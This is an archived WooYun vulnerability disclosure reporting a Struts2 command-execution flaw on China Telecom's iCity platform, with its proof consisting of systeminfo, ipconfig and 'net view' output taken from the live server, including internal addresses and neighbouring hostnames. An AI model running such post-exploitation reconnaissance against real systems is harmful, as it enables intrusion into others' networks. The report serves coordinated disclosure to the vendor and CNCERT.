当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036792

漏洞标题:中国电信爱城市平台存在struts2漏洞话说可以域渗透

相关厂商:m.189gs.com

漏洞作者: Restriedarea

提交时间:2013-09-11 16:57

修复时间:2013-10-26 16:57

公开时间:2013-10-26 16:57

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-11: 细节已通知厂商并且等待厂商处理中
2013-09-15: 厂商已经确认,细节仅向厂商公开
2013-09-25: 细节向核心白帽子及相关领域专家公开
2013-10-05: 细节向普通白帽子公开
2013-10-15: 细节向实习白帽子公开
2013-10-26: 细节向公众公开

简要描述:

中国电信爱城市平台存在struts2漏洞,话说可以域渗透

详细说明:

QQ图片20130911164609.jpg


http://m.189gs.com/
主机名: WIN-1ODVOF5RBKQ
OS 名称: Microsoft Windows Server 2008 R2 Enterprise
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 55041-507-3450002-84885
初始安装日期: 2013/5/29, 3:46:51
系统启动时间: 2013/5/30, 9:26:24
系统制造商: VMware, Inc.
系统型号: VMware Virtual Platform
系统类型: x64-based PC
处理器: 安装了 1 个处理器。
[01]: Intel64 Family 6 Model 29 Stepping 1 GenuineIntel ~2133 Mhz
BIOS 版本: Phoenix Technologies LTD 6.00, 2012/6/22
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 4,096 MB
可用的物理内存: 2,071 MB
虚拟内存: 最大值: 8,189 MB
虚拟内存: 可用: 6,223 MB
虚拟内存: 使用中: 1,966 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: 暂缺
修补程序: 安装了 68 个修补程序。
[01]: KB2425227
[02]: KB2506014
[03]: KB2506212
[04]: KB2509553
[05]: KB2511455
[06]: KB2533552
[07]: KB2536275
[08]: KB2536276
[09]: KB2544893
[10]: KB2552343
[11]: KB2560656
[12]: KB2564958
[13]: KB2570947
[14]: KB2584146
[15]: KB2585542
[16]: KB2604115
[17]: KB2618451
[18]: KB2620704
[19]: KB2621440
[20]: KB2631813
[21]: KB2643719
[22]: KB2644615
[23]: KB2645640
[24]: KB2653956
[25]: KB2654428
[26]: KB2655992
[27]: KB2656356
[28]: KB2658846
[29]: KB2659262
[30]: KB2661254
[31]: KB2667402
[32]: KB2676562
[33]: KB2685939
[34]: KB2690533
[35]: KB2691442
[36]: KB2698365
[37]: KB2705219
[38]: KB2706045
[39]: KB2712808
[40]: KB2718704
[41]: KB2729452
[42]: KB2742599
[43]: KB2743555
[44]: KB2749655
[45]: KB2753842
[46]: KB2757638
[47]: KB2758857
[48]: KB2765809
[49]: KB2769369
[50]: KB2770660
[51]: KB2779562
[52]: KB2785220
[53]: KB2786081
[54]: KB2789645
[55]: KB2790113
[56]: KB2790655
[57]: KB2798162
[58]: KB2804579
[59]: KB2807986
[60]: KB2813170
[61]: KB2813347
[62]: KB2820197
[63]: KB2829361
[64]: KB2829530
[65]: KB2830290
[66]: KB2840149
[67]: KB2847204
[68]: KB976902
网卡: 安装了 1 个 NIC。
[01]: Intel(R) PRO/1000 MT Network Connection
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: 192.168.136.15
[02]: fe80::f5fd:c37f:db3f:ee30
Windows IP 配置
主机名 . . . . . . . . . . . . . : WIN-1ODVOF5RBKQ
主 DNS 后缀 . . . . . . . . . . . :
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
物理地址. . . . . . . . . . . . . : 00-50-56-B6-46-19
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::f5fd:c37f:db3f:ee30%11(首选)
IPv4 地址 . . . . . . . . . . . . : 192.168.136.15(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.136.1
DHCPv6 IAID . . . . . . . . . . . : 234901590
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-19-36-C1-B4-00-50-56-B6-46-19
DNS 服务器 . . . . . . . . . . . : 202.100.64.68
TCPIP 上的 NetBIOS . . . . . . . : 已启用
隧道适配器 isatap.{EF330BEC-4B33-4CFC-8A58-7B5A8A262516}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
隧道适配器 Teredo Tunneling Pseudo-Interface:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
IPv6 地址 . . . . . . . . . . . . : 2001:0:4137:9e76:20ef:2831:3f57:77f0(首选)
本地链接 IPv6 地址. . . . . . . . : fe80::20ef:2831:3f57:77f0%13(首选)
默认网关. . . . . . . . . . . . . : ::
TCPIP 上的 NetBIOS . . . . . . . : 已禁用
C:\iCity\apache-tomcat-7.0.40\webapps\ROOT>net view
======================================================================
服务器名称 注解
-------------------------------------------------------------------------------
\\CESHI2003
\\WIN-1ODVOF5RBKQ
\\WIN-4LSFSRR5ER5
\\WIN-5IH0HF6AOUP
\\WIN-8IJ9K26FMRM
\\WIN-9F57U6M9RO7
\\WIN-AEOGFQJMG3G
\\WIN-E0T5EORBHMA
\\WIN-I4DSM3MU3JB
\\WIN-I8ACUU87QI7
\\WIN-RR63GKPII19
命令成功完成。

漏洞证明:

QQ图片20130911164609.jpg


主机名: WIN-1ODVOF5RBKQ
OS 名称: Microsoft Windows Server 2008 R2 Enterprise
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 55041-507-3450002-84885
初始安装日期: 2013/5/29, 3:46:51
系统启动时间: 2013/5/30, 9:26:24
系统制造商: VMware, Inc.
系统型号: VMware Virtual Platform
系统类型: x64-based PC
处理器: 安装了 1 个处理器。
[01]: Intel64 Family 6 Model 29 Stepping 1 GenuineIntel ~2133 Mhz
BIOS 版本: Phoenix Technologies LTD 6.00, 2012/6/22
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 4,096 MB
可用的物理内存: 2,071 MB
虚拟内存: 最大值: 8,189 MB
虚拟内存: 可用: 6,223 MB
虚拟内存: 使用中: 1,966 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: 暂缺
修补程序: 安装了 68 个修补程序。
[01]: KB2425227
[02]: KB2506014
[03]: KB2506212
[04]: KB2509553
[05]: KB2511455
[06]: KB2533552
[07]: KB2536275
[08]: KB2536276
[09]: KB2544893
[10]: KB2552343
[11]: KB2560656
[12]: KB2564958
[13]: KB2570947
[14]: KB2584146
[15]: KB2585542
[16]: KB2604115
[17]: KB2618451
[18]: KB2620704
[19]: KB2621440
[20]: KB2631813
[21]: KB2643719
[22]: KB2644615
[23]: KB2645640
[24]: KB2653956
[25]: KB2654428
[26]: KB2655992
[27]: KB2656356
[28]: KB2658846
[29]: KB2659262
[30]: KB2661254
[31]: KB2667402
[32]: KB2676562
[33]: KB2685939
[34]: KB2690533
[35]: KB2691442
[36]: KB2698365
[37]: KB2705219
[38]: KB2706045
[39]: KB2712808
[40]: KB2718704
[41]: KB2729452
[42]: KB2742599
[43]: KB2743555
[44]: KB2749655
[45]: KB2753842
[46]: KB2757638
[47]: KB2758857
[48]: KB2765809
[49]: KB2769369
[50]: KB2770660
[51]: KB2779562
[52]: KB2785220
[53]: KB2786081
[54]: KB2789645
[55]: KB2790113
[56]: KB2790655
[57]: KB2798162
[58]: KB2804579
[59]: KB2807986
[60]: KB2813170
[61]: KB2813347
[62]: KB2820197
[63]: KB2829361
[64]: KB2829530
[65]: KB2830290
[66]: KB2840149
[67]: KB2847204
[68]: KB976902
网卡: 安装了 1 个 NIC。
[01]: Intel(R) PRO/1000 MT Network Connection
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: 192.168.136.15
[02]: fe80::f5fd:c37f:db3f:ee30
Windows IP 配置
主机名 . . . . . . . . . . . . . : WIN-1ODVOF5RBKQ
主 DNS 后缀 . . . . . . . . . . . :
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
物理地址. . . . . . . . . . . . . : 00-50-56-B6-46-19
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::f5fd:c37f:db3f:ee30%11(首选)
IPv4 地址 . . . . . . . . . . . . : 192.168.136.15(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.136.1
DHCPv6 IAID . . . . . . . . . . . : 234901590
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-19-36-C1-B4-00-50-56-B6-46-19
DNS 服务器 . . . . . . . . . . . : 202.100.64.68
TCPIP 上的 NetBIOS . . . . . . . : 已启用
隧道适配器 isatap.{EF330BEC-4B33-4CFC-8A58-7B5A8A262516}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
隧道适配器 Teredo Tunneling Pseudo-Interface:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
IPv6 地址 . . . . . . . . . . . . : 2001:0:4137:9e76:20ef:2831:3f57:77f0(首选)
本地链接 IPv6 地址. . . . . . . . : fe80::20ef:2831:3f57:77f0%13(首选)
默认网关. . . . . . . . . . . . . : ::
TCPIP 上的 NetBIOS . . . . . . . : 已禁用
C:\iCity\apache-tomcat-7.0.40\webapps\ROOT>net view
======================================================================
服务器名称 注解
-------------------------------------------------------------------------------
\\CESHI2003
\\WIN-1ODVOF5RBKQ
\\WIN-4LSFSRR5ER5
\\WIN-5IH0HF6AOUP
\\WIN-8IJ9K26FMRM
\\WIN-9F57U6M9RO7
\\WIN-AEOGFQJMG3G
\\WIN-E0T5EORBHMA
\\WIN-I4DSM3MU3JB
\\WIN-I8ACUU87QI7
\\WIN-RR63GKPII19
命令成功完成。

修复方案:

升级,
求礼物。求rank啊

版权声明:转载请注明来源 Restriedarea@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2013-09-15 23:26

厂商回复:

最新状态:

暂无